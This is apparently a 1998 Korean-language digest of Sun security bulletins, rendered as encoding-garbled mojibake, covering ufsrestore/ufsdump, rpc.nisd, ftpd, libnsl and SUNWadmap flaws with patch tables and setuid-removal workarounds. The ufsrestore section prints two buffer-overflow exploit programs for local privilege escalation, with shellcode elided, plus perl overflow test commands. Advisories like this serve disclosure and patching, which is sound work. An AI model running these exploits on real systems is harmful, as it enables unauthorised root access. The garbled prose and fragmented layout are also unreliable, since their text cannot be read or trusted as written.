ÀÌ ÇÁ·Î±×·¥ÀÇ ¹ö±×¸¦ ÀÌ¿ëÇÏ¿© NFS ¼¹ö»ó¿¡ Á¸ÀçÇÏ´Â ÆÄÀϵé( ±× ÆÄÀϵéÀÌ NFS ¿¡ export µÈ file system ÀÌ ¾Æ´ÒÁö¶óµµ ) ¿¡ ´ëÇÑ Á¤º¸¸¦ ¾ò¾î³¾ ¼ö ÀÖ°Ô µÈ´Ù.
¡¡
¡¡
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®SunOS |
Patch ID |
SunOS 5.6 |
105615-03 |
SunOS 5.6_x86 |
105616-03 |
SunOS 5.5.1 |
104220-03 |
SunOS 5.5.1_x86 |
104221-03 |
SunOS 5.5 |
104223-02 |
SunOS 5.5_x86 |
104224-02 |
SunOS 5.4 |
102685-02 |
SunOS 5.4_x86 |
102686-02 |
SunOS 5.3 |
102654-02 |
¡¡
5. References
¡¡
10. ufsrestore (1998/4/29) ; bug id #169
1.
2.
ÇØ´ç ½Ã½ºÅÛSunOS 5.5, 5.5.1
3. Description of Bugs
ufsrestore À¯Æ¿¸®Æ¼´Â ¹é¾÷ ¹Ìµð¾î¿¡¼ ufsdump Ä¿¸Çµå¸¦ »ç¿ëÇÏ¿© »ý¼ºµÈ ÆÄÀϵéÀ» restore Çϴµ¥ »ç¿ëµÈ´Ù. ÀÌ ufsrestore ÀÇ ¹ö±×¸¦ »ç¿ëÇÏ¿© local user ¶ó¸é ´©±¸³ª root ÀÇ ±ÇÇÑÀ» ¾òÀ» ¼ö ÀÖ°Ô µÈ´Ù.
¡¡
(by Seth McGann)
Áï, root °¡ µÇÁö´Â ¸øÇß´õ¶óµµ tty ÀÇ ±ÇÇÑÀ» ¾òÀ» ¼ö ÀÖ°Ô µÈ´Ù.
ÀÌ °áÇÔÀ» ¾Æ·¡¿Í °°ÀÌ Å×½ºÆ® Çغ»´Ù.
/usr/lib/fs/ufs/ufsdump 1 `perl -e 'print "a" x 2000'`
/usr/lib/fs/ufs/ufsrestore xf `perl -e 'print "a" x 2000'`
Âü°í·Î ufsdump ¸¦ ÇØÅ·ÇÏ´Â ÇÁ·Î±×·¥Àº ¾Æ·¡¿Í °°´Ù. ºÎÀÛ¿ëÀ» ¹æÁöÇÏ´Â Â÷¿ø¿¡¼ ÀϺθ¦ »èÁ¦Çß´Ù.
¡¡
/* ufsdump.c
* Description: Overflows a buffer to give you EGID=tty.
* At least that's what id reports.
* The running shell thinks its still the user. Maybe I'm
* doing something wrong? At any
* rate, here ya go, have fun.
*
* smm@wpi.edu
* Thanks to: Jesse Schachter for the box, and
* Unknown parties for the shellcode. (probably Aleph1).
*/
¡¡
#include <stdio.h>
static inline getesp() {
__asm__(" movl %esp,%eax ");
}
main(int argc, char **argv) {
int i,j,buffer,offset;
long unsigned esp;
char unsigned buf[4096];
unsigned char
shellcode[]=
¡¦¡¦¡¦
buffer=895;
offset=3500;
if (argc>1)buffer=atoi(argv[1]);
if (argc>2)offset=atoi(argv[2]);
for (i=0;i<buffer;i++)
buf[i]=0x41; /* inc ecx */
j=0;
for (i=buffer;i<buffer+strlen(shellcode);i++)
buf[i]=shellcode[j++];
esp=getesp()+offset;
buf[i]=esp & 0xFF;
buf[i+1]=(esp >> 8) & 0xFF;
buf[i+2]=(esp >> 16) & 0xFF;
buf[i+3]=(esp >> 24) & 0xFF;
buf[i+4]=esp & 0xFF;
buf[i+5]=(esp >> 8) & 0xFF;
buf[i+6]=(esp >> 16) & 0xFF;
buf[i+7]=(esp >> 24) & 0xFF;
printf("Offset: 0x%x\n\n",esp);
execl("/usr/lib/fs/ufs/ufsdump","ufsdump","1",buf,NULL);
}
¡¡
ufsrestore ¸¦ ÇØÅ·ÇÏ´Â ÇÁ·Î±×·¥Àº ¾Æ·¡¿Í °°´Ù. ¿ª½Ã ºÎÀÛ¿ëÀ» ¹æÁöÇÏ´Â Â÷¿ø¿¡¼ ÄÚµåÀÇ ÀϺθ¦ »èÁ¦Çß´Ù.
¡¡
// ufsrestore solaris 2.4, 2.5, 2.5.1, 2.6 exploit
// by humble
// thanks to plaguez for help
¡¡
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
¡¡
#define BUF_LENGTH 300
#define EXTRA 100
#define STACK_OFFSET -600
#define SPARC_NOP 0xac15a16e
¡¡
// normal shell code cept I added a bunch of sll's and add's
// to get rid of a 2f '/' in there (from the sethi 0xbdcda, %l7)
// I don't know sparc assembly so this might be dumb :P
¡¡
// also added code to do seteuid(0); setuid(0); from erik's buffer
// overrun page
¡¡
¡¦¡¦¡¦¡¦¡¦¡¦
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
¡¡
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0,a=0;
¡¡
if(argc > 1) dso=atoi(argv[1]);
¡¡
long_p =(u_long *) buf ;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
¡¡
char_p = (u_char *) long_p;
¡¡
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
¡¡
long_p = (u_long *) char_p;
¡¡
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
¡¡
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
printf("hit ctrl-c and then type y\n");
execl("/usr/lib/fs/ufs/ufsrestore", &buf[4],"if", "-",(char *) 0);
perror("execl failed");
}
¡¡
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®105722-01 °ú 105724-01 ´Â ¾ÆÁ÷ ÆÐÄ¡°¡ ºÒ¿ÏÀüÇϹǷΠ¾Æ·¡¿Í °°ÀÌ ÀÓ½ÃÆÐÄ¡¸¦ Çϵµ·Ï ÇÑ´Ù.
chmod ug-s /usr/lib/fs/ufs/ufsdump
chmod u-s /usr/lib/fs/ufs/ufsrestore
OS vendor ¿¡¼ Á¦°øÇÏ´Â ÆÐÄ¡´Â ¾Æ·¡¿Í °°´Ù.
SunOS |
Patch ID |
SunOS 5.5.1 |
104490-05 |
SunOS 5.5.1_x86 |
104491-04 |
SunOS 5.5 |
103261-06 |
SunOS 5.5_x86 |
103262-06 |
¡¡
5. References
¡¡
11. rpc.nisd (1998/6/10) ; bug id #170
1.
rpc.nisd.
2.
ÇØ´ç ½Ã½ºÅÛ3. Description of Bugs
NIS+ ¿Í NIS ´Â ºÐ»êµÈ ȯ°æ¿¡¼ÀÇ »ç¿ëÀÚ, ¸Ó½®, ±âŸ network resource ¸¦ Áß¾Ó¿¡ ÁýÁß½ÃÄÑ °ü¸®ÇÔ¿¡ Æí¸®ÇÔÀ» Á¦°øÇÏ·Á°í °³¹ßµÇ¾ú´Ù.
buffer overflow ¸¦ ÀÏÀ¸Å³ ¼ö ÀÖ´Â ¹®Á¦Á¡ÀÌ NIS+ ³»¿¡ Á¸ÀçÇÑ´Ù.
ÀϹÝÀûÀ¸·Î RPC µ¥¸óÀ¸·Î º¸³»Áø µ¥ÀÌÅÍ´Â buffer overflow ¸¦ ÀÏÀ¸Å°Áö ¾Ê±â À§ÇØ ¸í½ÃµÈ maximum length ¸¦ °®´Â´Ù. ÇÏÁö¸¸ nis_name À̶õ NIS+ argument ´Â maximum length ¸¦ Á¤ÇصÎÁö ¾Ê¾Ò±â ¶§¹®¿¡ max length ´Â unsafe ÇÑ °ªÀÌ µÈ´Ù.
NIS+ ´Â ÀÌ argument ¸¦ °íÁ¤µÈ ±æÀÌÀÇ ½ºÅó»ºÎ ¹öÆÛ¿¡ º¹»çÇϱ⠶§¹®¿¡ ÇØÄ¿´Â ½ºÅÃÀ» overflow ½ÃÄѼ µ¥¸óÀ¸·Î ÇÏ¿©±Ý ÀÓÀÇÀÇ machine code ¸¦ ½ÇÇà½ÃÅ°µµ·Ï ÇÒ ¼ö ÀÖ´Ù. ÀÌ ¹®Á¦Á¡Àº ISS ÀÇ Josh Daymont ¿¡ ÀÇÇØ ¹ß°ßµÇ¾ú´Ù.
¡¡
°Ô´Ù°¡ ¸¸ÀÏ NIS+ ¼¹ö°¡ NIS ȣȯ ¸ðµå·Î ÀÛµ¿ÇÏ°í ÀÖ°í, ħÀÔÀÚ°¡ NIS+ ¼¹ö¸¦ º¯Á¶ÇÒ ¼ö ÀÖ´Ù¸é ħÀÔÀÚ´Â NIS ¼¹öÀÎ °Íó·³ À§ÀåÇÒ ¼ö ÀְԵǰí À̸¦ ÀÌ¿ëÇؼ NIS ¸¦ »ç¿ëÇÏ°í ÀÖ´Â ¸Ó½®µé¿¡ Á¢±Ù ±ÇÇÑÀ» °®°Ô µÈ´Ù.
¶ÇÇÑ Ä§ÀÔÀÚ°¡ NIS+ ¼¹ö¸¦ ¸Á°¡¶ß¸± ¼ö ÀÖ°Ô µÇ¸é NIS+ client Ãø¿¡ À߸øµÈ initialization Á¤º¸¸¦ ÁÙ ¼ö ÀÖ°Ô µÈ´Ù.
¡¡
Solaris ¸Ó½®¿¡¼ ÇöÀç ÀÚ½ÅÀÇ È£½ºÆ®°¡ nisd °áÇÔÀÌ Á¸ÀçÇÏ´ÂÁö¸¦ »ìÆ캸°í ½ÍÀ¸¸é rpc.nisd °¡ ¶° ÀÖ´ÂÁö È®ÀÎÇØ º»´Ù.
¡¡
solaris% rpcinfo -p localhost | grep 100300
¡¡
ÇöÀç ´ëºÎºÐÀÇ Solaris ¹öÀü¿¡¼ ¹ö±×°¡ Á¸ÀçÇϹǷΠ¾Æ·¡¿Í °°Àº °á°ú°¡ ³ª¿Â´Ù¸é ÆÐÄ¡¸¦ ÇØ¾ß ÇÑ´Ù.
100300 3 udp 32773 nisd
100300 3 tcp 32771 nisd
¡¡
rpc.nisd µ¥¸óÀº nis+ ¼ºñ½º¸¦ À§ÇØ ±¸ÇöµÈ RPC ¼ºñ½ºÀε¥, ÀÌ ¶§ NIS+ namespace ¿¡ ÇØ´çµÇ´Â ¸ðµç ¸Ó½Å¿¡¼ ±¸µ¿µÇ°í ÀÖ¾î¾ß ÇÑ´Ù.
ÀÌ rpc.nisd ¸¦ ÀÌ¿ëÇÏ¿© buffer overflow ¸¦ ÀÏÀ¸ÄÑ ÀÓÀÇÀÇ Ä¿¸Çµå¸¦ ½ÇÇà½ÃÄÑ root ±ÇÇÑÀ» ¾ò¾î³¾ ¼ö ÀÖ°Ô µÇ´Â °ÍÀÌ´Ù.
¡¡
¿ì¼± NIS+ ¿¡ ´ëÇØ Á»´õ ÀÚ¼¼È÷ ¾Ë¾Æº¸±â·Î ÇÏÀÚ.
NIS+ ´Â name resolution °ú ÀÎÁõ (authentication) ÀÇ ¹æ¹ýÀ¸·Î resource location ¹× °ü¸®¸¦ ÇÏ°Ô ÇØÁÖ´Â ÀÏÁ¾ÀÇ Network µð·ºÅ丮 ¼ºñ½ºÀÌ´Ù. YP ·Î Àß ¾Ë·ÁÁø NIS ÀÇ Â÷±â¹öÀüÀ̶ó°í ÇÒ ¼ö ÀÖ´Ù.
NIS+ Àº ONC RPC mechanism À» ÀÌ¿ëÇؼ NIS+ client µéÀÌ ¼¹ö¿¡°Ô RPC ¸¦ ÀÌ¿ëÇÏ¿© interaction À» ÇÒ ¼ö ÀÖµµ·Ï ÇØÁØ´Ù.
NIS+ ¿¡ ÀÇÇØ Á¦°øµÇ´Â ¼ºñ½ºµéÀº security-critical Çϱ⠶§¹®¿¡ NIS+ Àº secure ÇÏ°Ô ÀÛµ¿Çϵµ·Ï µðÀÚÀÎ µÇ¾ú´Ù. ÀÌ·¯ÇÑ µðÀÚÀÎÀ» Àß ¹Ý¿µÇØ ÁÖ´Â °ÍÀÌ "security levels" À̶õ °³³äÀÌ´Ù.
Security levels ´Â RPC NIS ÀÇ request ¿¡ ´ëÇØ ¾ó¸¶³ª Á¤¹ÐÇÏ°Ô °ËÁõÇÒ °ÍÀÎÁö¿¡ ´ëÇÑ Á¤µµ¸¦ Á¤ÇسõÀº ±âÁØÀÌ´Ù.
¡¡
NIS+ ¿¡´Â 0~2 ÀÇ 3 °¡Áö security ·¹º§ÀÌ ÀÖ´Ù.
Level 0 ¿¡¼´Â NIS+ server (rpc.nisd) ¿¡¼ µé¾î¿Â request °¡ Àû¹ýÇÑÁö (legitimacy) ¾Æ¹«·± ÀÎÁõµµ ÇÏÁö ¾Ê´Â´Ù. ÀÌ ¿É¼ÇÀº µð¹ö±ë ¸ñÀûÀ¸·Î Á¦°øµÈ´Ù.
Level 1 ¿¡¼´Â RPC AUTH_UNIX (client-presented UIDs and GIDs) °¡ ÀÎÁõ¹æ¹ýÀ¸·Î »ç¿ëµÈ´Ù.
°¡Àå secure ÇÑ Level ÀÎ Level 2 ¿¡¼´Â µé¾î¿À´Â request ¸¦ ÀÎÁõÇϱâ À§ÇØ AUTH_DES ¸¦ »ç¿ëÇÑ´Ù. ÇÏÁö¸¸ , ½Ã½ºÅÛÀÌ security level 2 ¸¦ ¿î¿µÇÏ°í ÀÖÀ» ¶§ , Áï ¸ðµç request ¿¡ ´ëÇØ ¾ÏÈ£ÈµÈ ÀÎÁõÀ» °ÅÃÄ¾ß ÇÏÁö¸¸ rpc.nisd µ¥¸óÀº ¸î¸î ÀÎÁõµÇÁö ¾ÊÀº RPC call À» ÇÑ´Ù. ÀÌ call µéÀÌ ¿ø°Ý clinet ¿¡¼ NIS+ ¼¹ö¿¡ ´ëÇÑ Áß¿äÇÑ Á¤º¸¸¦ ¾ò¾î³¾ ¼ö ÀÖµµ·Ï ÇÏ´Â °ÍÀÌ´Ù.
¡¡
±× »ÓÀÌ ¾Æ´Ï°í, ¿ø°ÝÀÇ Ä§ÀÔÀÚ°¡ NIS+ ¼¹ö°¡ NIS+ cache ¸¦ ÀÌ¿ëÇؼ logging ÇÏ´Â °ÍÀ» disable ½Ãų ¼öµµ ÀÖ°Ô µÈ´Ù. ÀÌ ¹®Á¦Á¡Àº NIS+ µ¥¸óÀÎ rpc.nisd ÀÇ ¹ö±× ¶§¹®¿¡ ¹ß»ýÇÏ°Ô µÈ´Ù.
¹®Á¦°¡ µÇ´Â ÀÌ 3 °¡Áö RPC call µéÀº ´ÙÀ½°ú °°´Ù.
NIS_CALLBACK RPC ¸¦ »ç¿ëÇÏ¿© ÀÓÀÇÀÇ client µéÀº ÁÖ¾îÁø PID ÀÇ À¯È¿¼ºÀ» °áÁ¤ÇÒ ¼ö ÀÖ°Ô µÈ´Ù. ¶Ç´Â multiple queries ¸¦ »ç¿ëÇÏ¿© ¸ðµç À¯È¿ÇÑ process ID µéÀ» Á¤¹ÐÇÏ°Ô °ËÁõÇÑ´Ù.
2. NIS_STATUS
NIS_STATUS RPC ¸¦ »ç¿ëÇÏ¿© client µéÀº ¾Æ·¡ÀÇ Ç׸ñ°ú °°Àº NIS+ ¼¹öÀÇ ¼³Á¤¿¡ ´ëÇÑ Á¤º¸¸¦ ¾òÀ» ¼ö ÀÖ´Ù.
3. NIS_SERVSTATE
ÀÌ RPC ¿¡ TAG_DEBUG ¿É¼ÇÀ» »ç¿ëÇÏ¿© ¾î¶°ÇÑ ¿ÜºÎ »ç¿ëÀÚ¶óµµ ¸ðµç rpc.nisd logging À» ÁߴܽÃų ¼ö ÀÖ´Ù. TAG_*CACHE (D, T, G) ¿É¼ÇÀ» »ç¿ëÇÏ¿© directory, table, group cache µéÀ» flush ½Ãų ¼ö ÀÖ´Ù.
¡¡
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®ÆÐÄ¡¸¦ ¼öÇàÇϱâ Àü±îÁö NIS+ ¸¦ »ç¿ëÇÏÁö ¾ÊÀ» °ÍÀ» ±ÇÇÑ´Ù. ÇÏÁö¸¸ ¹Ýµå½Ã NIS+ ¸¦ »ç¿ëÇØ¾ß ÇÏ´Â °æ¿ì ÆÐÄ¡¸¦ ²À Çϵµ·Ï ÇÏ°í ÆÐÄ¡¸¦ ÇÏÁö ¸øÇÑ °æ¿ì¿¡´Â ´ÙÀ½°ú °°Àº ¹æ¹ýÀ» ½á¼ Àӽ÷Π´ëºñÇÒ ¼ö ÀÖ´Ù.
ÆÐÄ¡¸¦ °³¹ßÁß¿¡ ÀÖ´Ù.
¾Æ·¡ÀÇ »çÀÌÆ®¿¡¼ ÆÐÄ¡¸¦ ±¸Çϵµ·Ï ÇÑ´Ù.
ftp://ftp.meshnet.or.jp/pub/48pub/securitySunOS |
Patch ID |
SunOS 5.6 |
105401-13 |
SunOS 5.6_x86 |
105402-13 |
SunOS 5.5.1 |
103612-41 |
SunOS 5.5.1_x86 |
103613-41 |
SunOS 5.5 |
103187-38 |
SunOS 5.5_x86 |
103188-38 |
SunOS 5.4 |
101973-35 |
SunOS 5.4_x86 |
101974-35 |
SunOS 5.3 |
101318-91 (to be released in 12 weeks) |
¡¡
12.ftpd (1998/6/10) ; bug id #171
1.
ftpd
SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86 and 5.3.
in.ftpd ´Â FTP (File Transfer Protocol) server process ÀÌ´Ù. in.ftpd ´Â inetd ¿¡¼ ftp service ·Î connection ÀÌ ¸¸µé¾î Áú ¶§¸¶´Ù È£ÃâµÈ´Ù. ÀÌ in.ftpd ¸¦ ¾Ç¿ëÇؼ ftp server ·Î Denial of Service attack À» ÇÒ ¼ö ÀÖ´Â ¹®Á¦Á¡ÀÌ º¸°í µÇ¾ú´Ù.
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®SunOS |
Patch ID |
SunOS 5.6 |
106301-01 |
SunOS 5.6_x86 |
106302-01 |
SunOS 5.5.1 |
103603-08 |
SunOS 5.5.1_x86 |
103604-08 |
SunOS 5.5 |
103577-08 |
SunOS 5.5_x86 |
103578-08 |
SunOS 5.4 |
101945-59 (to be released in 6 weeks) |
SunOS 5.4_x86 |
101946-52 (to be released in 6 weeks) |
SunOS 5.3 |
104938-02 |
¡¡
5. References
¡¡
libnsl
SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86 , 5.3.
³×Æ®¿÷
¼ºñ½º ¶óÀ̺귯¸®ÀÎ libnsl Àº application ÇÁ·Î±×·¥µéÀÌ network ¼ºñ½º¸¦ ÇÒ ¶§ interface °¡ µÇ´Â function µéÀ» Á¦°øÇÑ´Ù. ÀÌ ¶óÀ̺귯¸® ³»ºÎ ·çƾ¿¡¼ ¹öÆÛ¿À¹öÇ÷ο츦 ÀÏÀ¸Å³ ¼ö ÀÖ°í À̸¦ ¾Ç¿ëÇÏ¿© root ±ÇÇÑÀ» ¾ò¾î³¾ ¼ö ÀÖÀ½ÀÌ ¹ß°ßµÇ¾ú´Ù.¾Æ·¡ÀÇ
³»¿ëµéÀº RSI ¾îµå¹ÙÀÌÀú¸® #5 ¿¡ ±Ù°Å¸¦ µÎ°í ÀÖ´Ù. ÀÌ Ãë¾àÁ¡µéÀº Matt Conover ¿¡ ÀÇÇØ ¹ß°ßµÇ¾ú´Ù.Ãë¾àÇÑ
Function µé ¸®½ºÆ®
Ãë¾àÇÑ key function µé |
|
extract_secret( ) |
µ¥ÀÌÅ͸¦ ·ÎÄ® ¹öÆÛ·Î Ä«ÇÇÇÒ ¶§ ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹ß»ý °¡´É |
getkeys_nis( ) |
Key °ªÀÌ ¹öÆÛº¸´Ù Å« °æ¿ì ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹ß»ý °¡´É |
getpublickey( ) |
getkeys_nis( ) À» È£ÃâÇÔ |
getsecretkey( ) |
getkeys_nis( ) À» È£ÃâÇÔ |
¡¡
Ãë¾àÇÑ RPC function µé |
|
authdes_seccreate( ) |
getpublickey( ) À» È£ÃâÇÔ |
rpc_broadcast_exp( ) |
Network ÇÁ·ÎÅäÄÝ Å¸ÀÙÀ» ÁöÁ¤ÇÏ´Â °æ¿ì ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹ß»ý °¡´É |
rpc_broadcast( ) |
rpc_broadcast_exp( ) À» È£ÃâÇÔ |
clnt_create_timed( ) |
Network ÇÁ·ÎÅäÄÝ Å¸ÀÙÀ» ÁöÁ¤ÇÏ´Â °æ¿ì ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹ß»ý °¡´É |
host2netname( ) |
hostname À» ÁöÁ¤ÇÒ ¶§ ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹ß»ý°¡´É |
getnetname( ) |
host2netname( ) À» È£ÃâÇÔ |
clnt_create( ) |
clnt_create_timed( ) À» È£ÃâÇÔ |
rpc_call( ) |
Network ÇÁ·ÎÅäÄÝ Å¸ÀÙÀ» ÁöÁ¤ÇÏ´Â °æ¿ì ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹ß»ý °¡´É |
authdes_pk_seccreate( ) |
getnetname( ) À» È£ÃâÇÔ |
¡¡
¡¡Ãë¾àÇÑ NIS function µé |
|
__nis_init_callback( ) |
getpublickey( ) À» È£ÃâÇÔ |
__nis_core_lookup( ) |
ÆĶó¹ÌÅ͵éÀ» ·ÎÄ® ¹öÆÛ·Î Ä«ÇÇÇÒ ¶§ ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹ß»ý °¡´É |
nis_make_rpchandle( ) |
host2netname( ) À» È£ÃâÇÔ |
nis_dump_r( ) |
nis_make_rpchandle( ) À» È£ÃâÇÔ |
nis_dump( ) |
nis_dump_r( ) À» È£ÃâÇÔ |
__nis_auth2princ( ) |
machine name À» ÁöÁ¤ÇÒ ¶§ ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹ß»ý°¡´É |
__nis_host2nis_server( ) |
hostname À» ÁöÁ¤ÇÒ ¶§ ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹ß»ý°¡´É |
nis_name_of_r( ) |
ÆĶó¹ÌÅ͵éÀ» ·ÎÄ® ¹öÆÛ·Î Ä«ÇÇÇÒ ¶§ ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹ß»ý °¡´É |
nis_old_data_r( ) |
ÆĶó¹ÌÅ͵éÀ» ·ÎÄ® ¹öÆÛ·Î Ä«ÇÇÇÒ ¶§ ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹ß»ý °¡´É |
nis_list( ) |
__nis_core_lookup( ) À» È£ÃâÇÔ |
nis_add( ) |
nis_nameops( ) À» È£ÃâÇÔ |
nis_remove( ) |
nis_nameops( ) À» È£ÃâÇÔ |
nis_modify( ) |
nis_nameops( ) À» È£ÃâÇÔ |
nis_mkdir( ) |
nis_make_rpchandle( ) À» È£ÃâÇÔ |
nis_rmdir( ) |
nis_make_rpchandle( ) À» È£ÃâÇÔ |
¡¡
ÀáÀçÀûÀ¸·Î
Ãë¾à¼ºÀ» °¡Áö°í ÀÖ´Â ÇÁ·Î±×·¥µé¡¡Ãë¾àÇÑ
RPC function µéÀ» È£ÃâÇÏ´Â ÇÁ·Î±×·¥¡¡Ãë¾àÇÑ
key function µéÀ» È£ÃâÇÏ´Â ÇÁ·Î±×·¥¡¡Ãë¾àÇÑ
NIS function µéÀ» È£ÃâÇÏ´Â ÇÁ·Î±×·¥¡¡Ãë¾àÇÑ
YP function µéÀ» È£ÃâÇÏ´Â ÇÁ·Î±×·¥SunOS | Patch ID |
SunOS 5.6 |
105401-14 |
SunOS 5.6_x86 |
105402-14 |
SunOS 5.5.1 |
103612-43 |
SunOS 5.5.1_x86 |
103613-43 |
SunOS 5.5 |
103187-39 |
SunOS 5.5_x86 |
103188-39 |
SunOS 5.4 |
101973-36 |
SunOS 5.4_x86 |
101974-36 |
SunOS 5.3 |
101318-91 (8 ÁÖ À̳»¿¡ ¹èÆ÷µÉ ¿¹Á¤) |
http://sunsolve1.sun.com/pub-cgi/us/sec2html?secbull/172
SUNWadmap
SunOS 5.6 , 5.6_x86
SUNWadmap
Àº ½Ã½ºÅÛ °ü¸® application ÆÐÅ°ÁöÀε¥, Solaris 2.6 Hardware:3/98 °ú 5/98 ¾÷µ¥ÀÌÆ®ÆÇ¿¡ Æ÷ÇÔµÈ SUNWadmap ÆÐÅ°Áö¿¡ ħÀÔÀÚ°¡ root ±ÇÇÑÀ» ¾òÀ» ¼ö ÀÖ´Â ¹ö±×°¡ Á¸ÀçÇÑ´Ù.SunOS | Patch ID |
SunOS 5.6 |
105800-02 (patch 106125-05 °¡ ÇÊ¿ä) |
SunOS 5.6_x86 |
105801-02 (patch 106126-05 °¡ ÇÊ¿ä) |
http://sunsolve1.sun.com/pub-cgi/us/sec2html?secbull/173
¡¡